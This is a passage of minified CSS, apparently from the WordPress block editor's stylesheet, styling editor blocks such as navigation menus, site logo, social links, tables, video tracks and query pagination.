:where(.wp-block-latest-posts.is-grid),:root :where(.wp-block-latest-posts__list){ padding-left:0; } .wp-block-math__textarea-control textarea{ direction:ltr; font-family:Menlo,Consolas,monaco,monospace; } .wp-block-media-text__media{ position:relative; } .wp-block-media-text__media.is-transient img{ opacity:.3; } .wp-block-media-text__media .components-spinner{ left:50%; margin-left:-9px; margin-top:-9px; position:absolute; top:50%; } .wp-block-media-text .__resizable_base__{ grid-column:1 / span 2; grid-row:2; } .wp-block-media-text .editor-media-container__resizer{ width:100% !important; } .wp-block-media-text.is-image-fill .components-placeholder.has-illustration,.wp-block-media-text.is-image-fill .editor-media-container__resizer,.wp-block-media-text.is-image-fill-element .components-placeholder.has-illustration,.wp-block-media-text.is-image-fill-element .editor-media-container__resizer{ height:100% !important; } .wp-block-media-text>.block-editor-block-list__layout>.block-editor-block-list__block{ max-width:unset; } .wp-block-media-text--placeholder-image{ min-height:205px; } .block-editor-block-list__block[data-type="core/more"]{ margin-bottom:28px; margin-top:28px; max-width:100%; text-align:center; } .wp-block-more{ display:block; text-align:center; white-space:nowrap; } .wp-block-more .rich-text{ background:#fff; color:#757575; display:inline-flex; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:600; padding:10px 36px; position:relative; text-align:center; text-transform:uppercase; white-space:nowrap; } .wp-block-more:before{ border-top:3px dashed #ccc; content:""; left:0; position:absolute; right:0; top:50%; } .editor-styles-wrapper .wp-block-navigation ul{ margin-bottom:0; margin-left:0; margin-top:0; padding-left:0; } .editor-styles-wrapper .wp-block-navigation .wp-block-navigation-item.wp-block{ margin:revert; } .wp-block-navigation-item__label{ display:inline; } .wp-block-navigation-item,.wp-block-navigation__container{ background-color:inherit; } .wp-block-navigation:not(.is-selected):not(.has-child-selected) .has-child:hover>.wp-block-navigation__submenu-container{ opacity:0; visibility:hidden; } .has-child.has-child-selected>.wp-block-navigation__submenu-container,.has-child.is-selected>.wp-block-navigation__submenu-container{ display:flex; opacity:1; visibility:visible; } .is-dragging-components-draggable .has-child.is-dragging-within>.wp-block-navigation__submenu-container{ opacity:1; visibility:visible; } .is-editing>.wp-block-navigation__container{ display:flex; flex-direction:column; opacity:1; visibility:visible; } .is-dragging-components-draggable .wp-block-navigation-link>.wp-block-navigation__container{ opacity:1; visibility:hidden; } .is-dragging-components-draggable .wp-block-navigation-link>.wp-block-navigation__container .block-editor-block-draggable-chip-wrapper{ visibility:visible; } .is-editing>.wp-block-navigation__submenu-container>.block-list-appender{ display:block; position:static; width:100%; } .is-editing>.wp-block-navigation__submenu-container>.block-list-appender .block-editor-button-block-appender{ background:#1e1e1e; color:#fff; margin-left:auto; margin-right:0; padding:0; width:24px; } .wp-block-navigation__submenu-container .block-list-appender{ display:none; } .block-library-colors-selector{ width:auto; } .block-library-colors-selector .block-library-colors-selector__toggle{ display:block; margin:0 auto; padding:3px; width:auto; } .block-library-colors-selector .block-library-colors-selector__icon-container{ align-items:center; border-radius:4px; display:flex; height:30px; margin:0 auto; padding:3px; position:relative; } .block-library-colors-selector .block-library-colors-selector__state-selection{ border-radius:11px; box-shadow:inset 0 0 0 1px #0003; height:22px; line-height:20px; margin-left:auto; margin-right:auto; min-height:22px; min-width:22px; padding:2px; width:22px; } .block-library-colors-selector .block-library-colors-selector__state-selection>svg{ min-width:auto !important; } .block-library-colors-selector .block-library-colors-selector__state-selection.has-text-color>svg,.block-library-colors-selector .block-library-colors-selector__state-selection.has-text-color>svg path{ color:inherit; } .block-library-colors-selector__popover .color-palette-controller-container{ padding:16px; } .block-library-colors-selector__popover .components-base-control__label{ height:20px; line-height:20px; } .block-library-colors-selector__popover .component-color-indicator{ float:right; margin-top:2px; } .block-library-colors-selector__popover .components-panel__body-title{ display:none; } .wp-block-navigation .wp-block+.block-list-appender .block-editor-button-block-appender{ background-color:#1e1e1e; color:#fff; height:24px; } .wp-block-navigation .wp-block+.block-list-appender .block-editor-button-block-appender.block-editor-button-block-appender.block-editor-button-block-appender{ padding:0; } .wp-block-navigation .wp-block .wp-block .block-editor-button-block-appender{ background-color:initial; color:#1e1e1e; } .components-placeholder.wp-block-navigation-placeholder{ background:none; box-shadow:none; min-height:0; outline:none; padding:0; } .components-placeholder.wp-block-navigation-placeholder .components-placeholder__fieldset{ font-size:inherit; } .components-placeholder.wp-block-navigation-placeholder .components-placeholder__fieldset .components-button{ margin-bottom:0; } .components-placeholder.wp-block-navigation-placeholder{ color:inherit; } .wp-block-navigation.is-selected .components-placeholder.wp-block-navigation-placeholder{ color:#1e1e1e; } .wp-block-navigation-placeholder__preview{ align-items:center; display:flex; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; min-width:96px; } .wp-block-navigation.is-selected .wp-block-navigation-placeholder__preview{ display:none; } .wp-block-navigation-placeholder__preview{ background:#0000; color:currentColor; } .wp-block-navigation-placeholder__preview:before{ border:1px dashed; border-radius:inherit; bottom:0; content:""; display:block; left:0; pointer-events:none; position:absolute; right:0; top:0; } .wp-block-navigation-placeholder__preview>svg{ fill:currentColor; } .wp-block-navigation.is-vertical .is-medium .components-placeholder__fieldset,.wp-block-navigation.is-vertical .is-small .components-placeholder__fieldset{ min-height:90px; } .wp-block-navigation.is-vertical .is-large .components-placeholder__fieldset{ min-height:132px; } .wp-block-navigation-placeholder__controls,.wp-block-navigation-placeholder__preview{ align-items:flex-start; flex-direction:row; padding:6px 8px; } .wp-block-navigation-placeholder__controls{ background-color:#fff; border-radius:2px; box-shadow:inset 0 0 0 1px #1e1e1e; display:none; position:relative; z-index:1; } .wp-block-navigation.is-selected .wp-block-navigation-placeholder__controls{ display:flex; } .wp-block-navigation-placeholder__controls{ float:left; width:100%; } .is-medium .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator,.is-medium .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator+hr,.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator,.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator+hr{ display:none; } .is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions,.wp-block-navigation.is-vertical .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions{ align-items:flex-start; flex-direction:column; } .is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions hr,.wp-block-navigation.is-vertical .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions hr{ display:none; } .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__icon{ height:36px; margin-right:12px; } .wp-block-navigation-placeholder__actions__indicator{ align-items:center; display:flex; height:36px; justify-content:flex-start; line-height:0; margin-left:4px; padding:0 6px 0 0; } .wp-block-navigation-placeholder__actions__indicator svg{ margin-right:4px; fill:currentColor; } .wp-block-navigation .components-placeholder.is-medium .components-placeholder__fieldset{ flex-direction:row !important; } .wp-block-navigation-placeholder__actions{ align-items:center; display:flex; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; gap:6px; } .wp-block-navigation-placeholder__actions .components-dropdown,.wp-block-navigation-placeholder__actions>.components-button{ margin-right:0; } .wp-block-navigation-placeholder__actions{ height:100%; } .wp-block-navigation-placeholder__actions.wp-block-navigation-placeholder__actions hr{ background-color:#1e1e1e; border:0; height:100%; margin:auto 0; max-height:16px; min-height:1px; min-width:1px; } @media (min-width:600px){ .wp-block-navigation__responsive-container:not(.is-menu-open) .components-button.wp-block-navigation__responsive-container-close{ display:none; } } .wp-block-navigation__responsive-container.is-menu-open{ position:fixed; top:159px; } @media (min-width:782px){ .wp-block-navigation__responsive-container.is-menu-open{ left:36px; top:97px; } } @media (min-width:960px){ .wp-block-navigation__responsive-container.is-menu-open{ left:160px; } } .is-mobile-preview .wp-block-navigation__responsive-container.is-menu-open,.is-tablet-preview .wp-block-navigation__responsive-container.is-menu-open{ top:145px; } .is-fullscreen-mode .wp-block-navigation__responsive-container.is-menu-open{ left:0; top:159px; } @media (min-width:782px){ .is-fullscreen-mode .wp-block-navigation__responsive-container.is-menu-open{ top:65px; } } .is-fullscreen-mode .is-mobile-preview .wp-block-navigation__responsive-container.is-menu-open,.is-fullscreen-mode .is-tablet-preview .wp-block-navigation__responsive-container.is-menu-open{ top:113px; } body.editor-styles-wrapper .wp-block-navigation__responsive-container.is-menu-open{ bottom:0; left:0; right:0; top:0; } .components-button.wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close,.components-button.wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open{ color:inherit; height:auto; padding:0; } .components-heading.wp-block-navigation-off-canvas-editor__title{ margin:0; } .wp-block-navigation-off-canvas-editor__header{ margin-bottom:8px; } .is-menu-open .wp-block-navigation__responsive-container-content * .block-list-appender{ margin-top:16px; } @keyframes fadein{ 0%{ opacity:0; } to{ opacity:1; } } .wp-block-navigation__loading-indicator-container{ padding:8px 12px; } .wp-block-navigation .wp-block-navigation__uncontrolled-inner-blocks-loading-indicator{ margin-top:0; } @keyframes fadeouthalf{ 0%{ opacity:1; } to{ opacity:.5; } } .wp-block-navigation-delete-menu-button{ justify-content:center; margin-bottom:16px; width:100%; } .components-button.is-link.wp-block-navigation-manage-menus-button{ margin-bottom:16px; } .wp-block-navigation__overlay-menu-preview{ align-items:center; background-color:#f0f0f0; display:flex; grid-column:span 2; height:64px !important; justify-content:space-between; padding:0 24px; width:100%; } .wp-block-navigation__overlay-menu-preview.open{ background-color:#fff; box-shadow:inset 0 0 0 1px #e0e0e0; outline:1px solid #0000; } .wp-block-navigation-placeholder__actions hr+hr,.wp-block-navigation__toolbar-menu-selector.components-toolbar-group:empty{ display:none; } .wp-block-navigation__navigation-selector{ margin-bottom:16px; width:100%; } .wp-block-navigation__navigation-selector-button{ border:1px solid; justify-content:space-between; width:100%; } .wp-block-navigation__navigation-selector-button__icon{ flex:0 0 auto; } .wp-block-navigation__navigation-selector-button__label{ flex:0 1 auto; overflow:hidden; text-overflow:ellipsis; white-space:nowrap; } .wp-block-navigation__navigation-selector-button--createnew{ border:1px solid; margin-bottom:16px; width:100%; } .wp-block-navigation__responsive-container-open.components-button{ opacity:1; } .wp-block-navigation__menu-inspector-controls{ overflow-x:auto; } .wp-block-navigation__menu-inspector-controls::-webkit-scrollbar{ height:12px; width:12px; } .wp-block-navigation__menu-inspector-controls::-webkit-scrollbar-track{ background-color:initial; } .wp-block-navigation__menu-inspector-controls::-webkit-scrollbar-thumb{ background-clip:padding-box; background-color:initial; border:3px solid #0000; border-radius:8px; } .wp-block-navigation__menu-inspector-controls:focus-within::-webkit-scrollbar-thumb,.wp-block-navigation__menu-inspector-controls:focus::-webkit-scrollbar-thumb,.wp-block-navigation__menu-inspector-controls:hover::-webkit-scrollbar-thumb{ background-color:#949494; } .wp-block-navigation__menu-inspector-controls{ scrollbar-color:#0000 #0000; scrollbar-gutter:stable both-edges; scrollbar-width:thin; } .wp-block-navigation__menu-inspector-controls:focus,.wp-block-navigation__menu-inspector-controls:focus-within,.wp-block-navigation__menu-inspector-controls:hover{ scrollbar-color:#949494 #0000; } .wp-block-navigation__menu-inspector-controls{ will-change:transform; } @media (hover:none){ .wp-block-navigation__menu-inspector-controls{ scrollbar-color:#949494 #0000; } } .wp-block-navigation__menu-inspector-controls__empty-message{ margin-left:24px; } .editor-sidebar__panel .wp-block-navigation__submenu-header{ margin-bottom:0; margin-top:0; } .wp-block-navigation__submenu-accessibility-notice{ grid-column:span 2; } .wp-block-navigation .block-list-appender{ position:relative; } .wp-block-navigation .has-child{ cursor:pointer; } .wp-block-navigation .has-child .wp-block-navigation__submenu-container{ z-index:28; } .wp-block-navigation .has-child:hover .wp-block-navigation__submenu-container{ z-index:29; } .wp-block-navigation .has-child.has-child-selected>.wp-block-navigation__submenu-container,.wp-block-navigation .has-child.is-selected>.wp-block-navigation__submenu-container{ height:auto !important; min-width:200px !important; opacity:1 !important; overflow:visible !important; visibility:visible !important; width:auto !important; } .wp-block-navigation-item .wp-block-navigation-item__content{ cursor:text; } .wp-block-navigation-item.is-editing,.wp-block-navigation-item.is-selected{ min-width:20px; } .wp-block-navigation-item .block-list-appender{ margin:16px auto 16px 16px; } .wp-block-navigation-link__invalid-item{ color:#000; } .wp-block-navigation-link__placeholder{ background-image:none !important; box-shadow:none !important; position:relative; text-decoration:none !important; } .wp-block-navigation-link__placeholder .wp-block-navigation-link__placeholder-text span{ -webkit-text-decoration:wavy underline; text-decoration:wavy underline; -webkit-text-decoration-skip-ink:none; text-decoration-skip-ink:none; text-underline-offset:.25rem; } .wp-block-navigation-link__placeholder.wp-block-navigation-item__content{ cursor:pointer; } .link-control-transform{ border-top:1px solid #ccc; padding:0 16px 8px; } .link-control-transform__subheading{ color:#1e1e1e; font-size:11px; font-weight:500; margin-bottom:1.5em; text-transform:uppercase; } .link-control-transform__items{ display:flex; justify-content:space-between; } .link-control-transform__item{ flex-basis:33%; flex-direction:column; gap:8px; height:auto; } .link-ui-page-creator{ max-width:350px; min-width:auto; padding-top:8px; width:90vw; } .link-ui-page-creator__inner{ padding:16px; } .link-ui-page-creator__back{ margin-left:8px; text-transform:uppercase; } .navigation-link-control__error-text{ color:#cc1818; } .wp-block-navigation-submenu{ display:block; } .wp-block-navigation-submenu .wp-block-navigation__submenu-container{ z-index:28; } .wp-block-navigation-submenu.has-child-selected>.wp-block-navigation__submenu-container,.wp-block-navigation-submenu.is-selected>.wp-block-navigation__submenu-container{ height:auto !important; left:-1px; min-width:200px !important; opacity:1 !important; position:absolute; top:100%; visibility:visible !important; width:auto !important; } @media (min-width:782px){ .wp-block-navigation-submenu.has-child-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation-submenu.is-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{ left:100%; top:-1px; } .wp-block-navigation-submenu.has-child-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before,.wp-block-navigation-submenu.is-selected>.wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before{ background:#0000; content:""; display:block; height:100%; position:absolute; right:100%; width:.5em; } } .block-editor-block-list__block[data-type="core/nextpage"]{ margin-bottom:28px; margin-top:28px; max-width:100%; text-align:center; } .wp-block-nextpage{ display:block; text-align:center; white-space:nowrap; } .wp-block-nextpage>span{ background:#fff; border-radius:4px; color:#757575; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:600; height:24px; padding:6px 8px; position:relative; text-transform:uppercase; } .wp-block-nextpage:before{ border-top:3px dashed #ccc; content:""; left:0; position:absolute; right:0; top:50%; } .wp-block-navigation.items-justified-space-between .wp-block-page-list,.wp-block-navigation.items-justified-space-between .wp-block-page-list>div{ display:contents; flex:1; } .wp-block-navigation.items-justified-space-between.has-child-selected .wp-block-page-list,.wp-block-navigation.items-justified-space-between.has-child-selected .wp-block-page-list>div,.wp-block-navigation.items-justified-space-between.is-selected .wp-block-page-list,.wp-block-navigation.items-justified-space-between.is-selected .wp-block-page-list>div{ flex:inherit; } .wp-block-navigation .wp-block-navigation__submenu-container>.wp-block-page-list{ display:block; } .wp-block-pages-list__item__link{ pointer-events:none; } @media (min-width:600px){ .wp-block-page-list-modal{ max-width:480px; } } .wp-block-page-list-modal-buttons{ display:flex; gap:12px; justify-content:flex-end; } .wp-block-page-list .open-on-click:focus-within>.wp-block-navigation__submenu-container{ height:auto; min-width:200px; opacity:1; visibility:visible; width:auto; } .wp-block-page-list__loading-indicator-container{ padding:8px 12px; } .block-editor-block-list__block[data-type="core/paragraph"].has-drop-cap:focus{ min-height:auto !important; } .block-editor-block-list__block[data-empty=true] [data-rich-text-placeholder]{ opacity:1; } .block-editor-block-list__block[data-empty=true]+.block-editor-block-list__block[data-empty=true]:not([data-custom-placeholder=true]) [data-rich-text-placeholder]{ opacity:0; } .block-editor-block-list__block[data-type="core/paragraph"].has-text-align-left[style*="writing-mode: vertical-lr"],.block-editor-block-list__block[data-type="core/paragraph"].has-text-align-right[style*="writing-mode: vertical-rl"]{ rotate:180deg; } .is-zoomed-out .block-editor-block-list__block[data-empty=true] [data-rich-text-placeholder]{ opacity:0; } .wp-block-post-excerpt .wp-block-post-excerpt__excerpt.is-inline{ display:inline; } .wp-block-pullquote.is-style-solid-color blockquote p{ font-size:32px; } .wp-block-pullquote.is-style-solid-color .wp-block-pullquote__citation{ font-style:normal; text-transform:none; } .wp-block-pullquote__citation{ color:inherit; } .wp-block-rss li a>div{ display:inline; } .wp-block-rss__placeholder-form .wp-block-rss__placeholder-input{ flex:1 1 auto; } .wp-block-rss .wp-block-rss{ all:inherit; margin:0; padding:0; } .wp-block[data-align=center] .wp-block-search .wp-block-search__inside-wrapper{ margin:auto; } .wp-block-search :where(.wp-block-search__button){ align-items:center; border-radius:initial; display:flex; height:auto; justify-content:center; text-align:center; } .wp-block-search__inspector-controls .components-base-control{ margin-bottom:0; } .block-editor-block-list__block[data-type="core/separator"]{ padding-bottom:.1px; padding-top:.1px; } .blocks-shortcode__textarea{ background:#fff !important; border:1px solid #1e1e1e !important; border-radius:2px !important; box-shadow:none !important; box-sizing:border-box; color:#1e1e1e !important; font-family:Menlo,Consolas,monaco,monospace !important; font-size:16px !important; max-height:250px; padding:12px !important; resize:none; } @media (min-width:600px){ .blocks-shortcode__textarea{ font-size:13px !important; } } .blocks-shortcode__textarea:focus{ border-color:var(--wp-admin-theme-color) !important; box-shadow:0 0 0 1px var(--wp-admin-theme-color) !important; outline:2px solid #0000 !important; } .wp-block-site-logo.aligncenter>div,.wp-block[data-align=center]>.wp-block-site-logo{ display:table; margin-left:auto; margin-right:auto; } .wp-block-site-logo a{ pointer-events:none; } .wp-block-site-logo .custom-logo-link{ cursor:inherit; } .wp-block-site-logo .custom-logo-link:focus{ box-shadow:none; } .wp-block-site-logo img{ display:block; height:auto; max-width:100%; } .wp-block-site-logo.is-transient{ position:relative; } .wp-block-site-logo.is-transient img{ opacity:.3; } .wp-block-site-logo.is-transient .components-spinner{ left:50%; margin:0; position:absolute; top:50%; transform:translate(-50%, -50%); } .wp-block-site-logo.wp-block-site-logo.is-default-size .components-placeholder{ height:60px; width:60px; } .wp-block-site-logo.wp-block-site-logo .components-resizable-box__container,.wp-block-site-logo.wp-block-site-logo>div{ border-radius:inherit; } .wp-block-site-logo.wp-block-site-logo .components-placeholder{ align-items:center; border-radius:inherit; display:flex; height:100%; justify-content:center; min-height:48px; min-width:48px; padding:0; width:100%; } .wp-block-site-logo.wp-block-site-logo .components-placeholder .components-drop-zone__content-text,.wp-block-site-logo.wp-block-site-logo .components-placeholder .components-form-file-upload{ display:none; } .wp-block-site-logo.wp-block-site-logo .components-placeholder .components-button.components-button{ align-items:center; background:var(--wp-admin-theme-color); border-color:var(--wp-admin-theme-color); border-radius:50%; border-style:solid; color:#fff; display:flex; height:48px; justify-content:center; margin:auto; padding:0; position:relative; width:48px; } .wp-block-site-logo.wp-block-site-logo .components-placeholder .components-button.components-button>svg{ color:inherit; } .block-library-site-logo__inspector-media-replace-container{ position:relative; } .block-library-site-logo__inspector-media-replace-container .components-drop-zone__content-icon{ display:none; } .block-library-site-logo__inspector-media-replace-container button.components-button{ box-shadow:inset 0 0 0 1px #ccc; color:#1e1e1e; display:block; height:40px; width:100%; } .block-library-site-logo__inspector-media-replace-container button.components-button:hover{ color:var(--wp-admin-theme-color); } .block-library-site-logo__inspector-media-replace-container button.components-button:focus{ box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); } .block-library-site-logo__inspector-media-replace-container .block-library-site-logo__inspector-media-replace-title{ text-align:start; text-align-last:center; white-space:normal; word-break:break-all; } .block-library-site-logo__inspector-media-replace-container .components-dropdown{ display:block; } .block-library-site-logo__inspector-media-replace-container img{ aspect-ratio:1; border-radius:50% !important; box-shadow:inset 0 0 0 1px #0003; min-width:20px; width:20px; } .block-library-site-logo__inspector-media-replace-container .block-library-site-logo__inspector-readonly-logo-preview{ display:flex; height:40px; padding:6px 12px; } .wp-block-site-tagline__placeholder,.wp-block-site-title__placeholder{ border:1px dashed; padding:1em 0; } .wp-block-social-links .wp-social-link{ line-height:0; } .wp-block-social-link-anchor{ align-items:center; background:none; border:0; box-sizing:border-box; color:currentColor; cursor:pointer; display:inline-flex; font-family:inherit; font-size:inherit; font-weight:inherit; height:auto; margin:0; opacity:1; padding:.25em; } .wp-block-social-link-anchor:hover{ transform:none; } :root :where(.wp-block-social-links.is-style-pill-shape .wp-social-link button){ padding-left:.6666666667em; padding-right:.6666666667em; } :root :where(.wp-block-social-links.is-style-logos-only .wp-social-link button){ padding:0; } .wp-block-social-link__toolbar_content_text{ width:250px; } .wp-block-social-links div.block-editor-url-input{ display:inline-block; margin-left:8px; } .wp-social-link:hover{ transform:none; } :root :where(.wp-block-social-links){ padding:0; } .wp-block.wp-block-social-links.aligncenter,.wp-block[data-align=center]>.wp-block-social-links{ justify-content:center; } .block-editor-block-preview__content .components-button:disabled{ opacity:1; } .wp-social-link.wp-social-link__is-incomplete{ opacity:.5; } .wp-block-social-links .is-selected .wp-social-link__is-incomplete,.wp-social-link.wp-social-link__is-incomplete:focus,.wp-social-link.wp-social-link__is-incomplete:hover{ opacity:1; } .wp-block-social-links .block-list-appender{ position:static; } .wp-block-social-links .block-list-appender .block-editor-inserter{ font-size:inherit; } .wp-block-social-links .block-list-appender .block-editor-button-block-appender{ font-size:inherit; height:1.5em; padding:0; width:1.5em; } .block-editor-block-list__block[data-type="core/spacer"]:before{ content:""; display:block; height:100%; min-height:8px; min-width:8px; position:absolute; width:100%; z-index:1; } .block-library-spacer__resize-container.has-show-handle,.wp-block-spacer.is-hovered .block-library-spacer__resize-container,.wp-block-spacer.is-selected.custom-sizes-disabled{ background:#0000001a; } .is-dark-theme .block-library-spacer__resize-container.has-show-handle,.is-dark-theme .wp-block-spacer.is-hovered .block-library-spacer__resize-container,.is-dark-theme .wp-block-spacer.is-selected.custom-sizes-disabled{ background:#ffffff26; } .block-library-spacer__resize-container{ clear:both; } .block-library-spacer__resize-container:not(.is-resizing){ height:100% !important; width:100% !important; } .block-library-spacer__resize-container .components-resizable-box__handle:before{ content:none; } .block-library-spacer__resize-container.resize-horizontal{ height:100% !important; margin-bottom:0; } .wp-block[data-align=center]>.wp-block-table,.wp-block[data-align=left]>.wp-block-table,.wp-block[data-align=right]>.wp-block-table{ height:auto; } .wp-block[data-align=center]>.wp-block-table table,.wp-block[data-align=left]>.wp-block-table table,.wp-block[data-align=right]>.wp-block-table table{ width:auto; } .wp-block[data-align=center]>.wp-block-table td,.wp-block[data-align=center]>.wp-block-table th,.wp-block[data-align=left]>.wp-block-table td,.wp-block[data-align=left]>.wp-block-table th,.wp-block[data-align=right]>.wp-block-table td,.wp-block[data-align=right]>.wp-block-table th{ word-break:break-word; } .wp-block[data-align=center]>.wp-block-table{ text-align:initial; } .wp-block[data-align=center]>.wp-block-table table{ margin:0 auto; } .wp-block-table td,.wp-block-table th{ border:1px solid; padding:.5em; } .wp-block-table td.is-selected,.wp-block-table th.is-selected{ border-color:var(--wp-admin-theme-color); border-style:double; box-shadow:inset 0 0 0 1px var(--wp-admin-theme-color); } .wp-block-table table.has-individual-borders td,.wp-block-table table.has-individual-borders th,.wp-block-table table.has-individual-borders tr,.wp-block-table table.has-individual-borders>*{ border:1px solid; } .blocks-table__placeholder-form.blocks-table__placeholder-form{ align-items:flex-start; display:flex; flex-direction:column; gap:8px; } @media (min-width:782px){ .blocks-table__placeholder-form.blocks-table__placeholder-form{ align-items:flex-end; flex-direction:row; } } .blocks-table__placeholder-input{ width:112px; } .wp-block-tag-cloud .wp-block-tag-cloud{ border:none; border-radius:inherit; margin:0; padding:0; } .block-editor-template-part__selection-modal{ z-index:1000001; } .block-editor-template-part__selection-modal .block-editor-block-patterns-list{ column-count:2; column-gap:24px; } @media (min-width:1280px){ .block-editor-template-part__selection-modal .block-editor-block-patterns-list{ column-count:3; } } .block-editor-template-part__selection-modal .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{ break-inside:avoid-column; } .block-library-template-part__selection-search{ background:#fff; padding:16px 0; position:sticky; top:0; z-index:2; } .block-editor-block-list__block:not(.remove-outline).is-reusable.block-editor-block-list__block:not([contenteditable]):focus:after,.block-editor-block-list__block:not(.remove-outline).is-reusable.is-highlighted:after,.block-editor-block-list__block:not(.remove-outline).is-reusable.is-selected:after,.block-editor-block-list__block:not(.remove-outline).wp-block-template-part.block-editor-block-list__block:not([contenteditable]):focus:after,.block-editor-block-list__block:not(.remove-outline).wp-block-template-part.is-highlighted:after,.block-editor-block-list__block:not(.remove-outline).wp-block-template-part.is-selected:after{ outline-color:var(--wp-block-synced-color); } .is-outline-mode .block-editor-block-list__block:not(.remove-outline).wp-block-template-part.has-editable-outline:after{ border:none; } .wp-block-term-template .term-loading .term-loading-placeholder{ background-color:#f0f0f0; border-radius:2px; height:1.5em; margin-bottom:.25em; width:100%; } @media not (prefers-reduced-motion){ .wp-block-term-template .term-loading .term-loading-placeholder{ animation:loadingpulse 1.5s ease-in-out infinite; } } @keyframes loadingpulse{ 0%{ opacity:1; } 50%{ opacity:.5; } to{ opacity:1; } } .wp-block-text-columns .block-editor-rich-text__editable:focus{ outline:1px solid #ddd; } .wp-block[data-align=center]>.wp-block-video{ text-align:center; } .wp-block-video{ position:relative; } .wp-block-video.is-transient video{ opacity:.3; } .wp-block-video .components-spinner{ left:50%; margin-left:-9px; margin-top:-9px; position:absolute; top:50%; } .block-library-video-tracks-editor{ z-index:159990; } .block-library-video-tracks-editor__track-list-track{ padding-left:12px; } .block-library-video-tracks-editor__single-track-editor-kind-select{ max-width:240px; } .block-library-video-tracks-editor__single-track-editor-edit-track-label,.block-library-video-tracks-editor__tracks-informative-message-title{ color:#757575; display:block; font-size:11px; font-weight:500; margin-top:4px; text-transform:uppercase; } .block-library-video-tracks-editor>.components-popover__content{ width:360px; } .block-library-video-tracks-editor__add-tracks-container .components-menu-group__label,.block-library-video-tracks-editor__track-list .components-menu-group__label{ padding:0; } .block-library-video-tracks-editor__tracks-informative-message{ padding:8px; } .block-library-video-tracks-editor__tracks-informative-message-description{ margin-bottom:0; } .block-library-query-pattern__selection-modal .block-editor-block-patterns-list{ column-count:2; column-gap:24px; } @media (min-width:1280px){ .block-library-query-pattern__selection-modal .block-editor-block-patterns-list{ column-count:3; } } .block-library-query-pattern__selection-modal .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{ break-inside:avoid-column; } .block-library-query-pattern__selection-modal .block-library-query-pattern__selection-search{ background:#fff; margin-bottom:-4px; padding:16px 0; position:sticky; top:0; transform:translateY(-4px); z-index:2; } @media (min-width:600px){ .wp-block-query__enhanced-pagination-modal{ max-width:480px; } } .block-editor-block-settings-menu__popover.is-expanded{ overflow-y:scroll; } .block-editor-block-settings-menu__popover .block-library-query-pattern__selection-content{ height:100%; } .block-editor-block-settings-menu__popover .block-editor-block-patterns-list{ display:grid; grid-template-columns:1fr; } @media (min-width:600px){ .block-editor-block-settings-menu__popover .block-editor-block-patterns-list{ grid-template-columns:1fr 1fr; } } .block-editor-block-settings-menu__popover .block-editor-block-patterns-list{ grid-gap:12px; min-width:280px; } @media (min-width:600px){ .block-editor-block-settings-menu__popover .block-editor-block-patterns-list{ min-width:480px; } } .block-editor-block-settings-menu__popover .block-editor-block-patterns-list__list-item{ margin-bottom:0; } .wp-block-query>.block-editor-media-placeholder.is-small{ min-height:60px; } .wp-block[data-align=center]>.wp-block-query-pagination{ justify-content:center; } :where(.editor-styles-wrapper) .wp-block-query-pagination{ max-width:100%; } :where(.editor-styles-wrapper) .wp-block-query-pagination.block-editor-block-list__layout{ margin:0; } .wp-block-query-pagination-numbers a{ text-decoration:underline; } .wp-block-query-pagination-numbers .page-numbers{ margin-right:2px; } .wp-block-query-pagination-numbers .page-numbers:last-child{ margin-right:0; } .wp-block-post-featured-image .block-editor-media-placeholder{ backdrop-filter:none; z-index:1; } .wp-block-post-featured-image .components-placeholder,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder{ align-items:center; display:flex; justify-content:center; padding:0; } .wp-block-post-featured-image .components-placeholder .components-form-file-upload,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder .components-form-file-upload{ display:none; } .wp-block-post-featured-image .components-placeholder .components-button,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder .components-button{ align-items:center; background:var(--wp-admin-theme-color); border-color:var(--wp-admin-theme-color); border-radius:50%; border-style:solid; color:#fff; display:flex; height:48px; justify-content:center; margin:auto; padding:0; position:relative; width:48px; } .wp-block-post-featured-image .components-placeholder .components-button>svg,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder .components-button>svg{ color:inherit; } .wp-block-post-featured-image .components-placeholder,.wp-block-post-featured-image .wp-block-post-featured-image__placeholder{ min-height:200px; } .wp-block-post-featured-image .components-placeholder:where(.has-border-color),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where(.has-border-color),.wp-block-post-featured-image img:where(.has-border-color){ border-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-top-color]),.wp-block-post-featured-image .wp-block-post-featured-image__placeholder:where([style*=border-top-color]),.wp-block-post-featured-image img:where([style*=border-top-color]){ border-top-style:solid; } .wp-block-post-featured-image .components-placeholder:where([style*=border-right-color]),.wp-block-post-featured-image 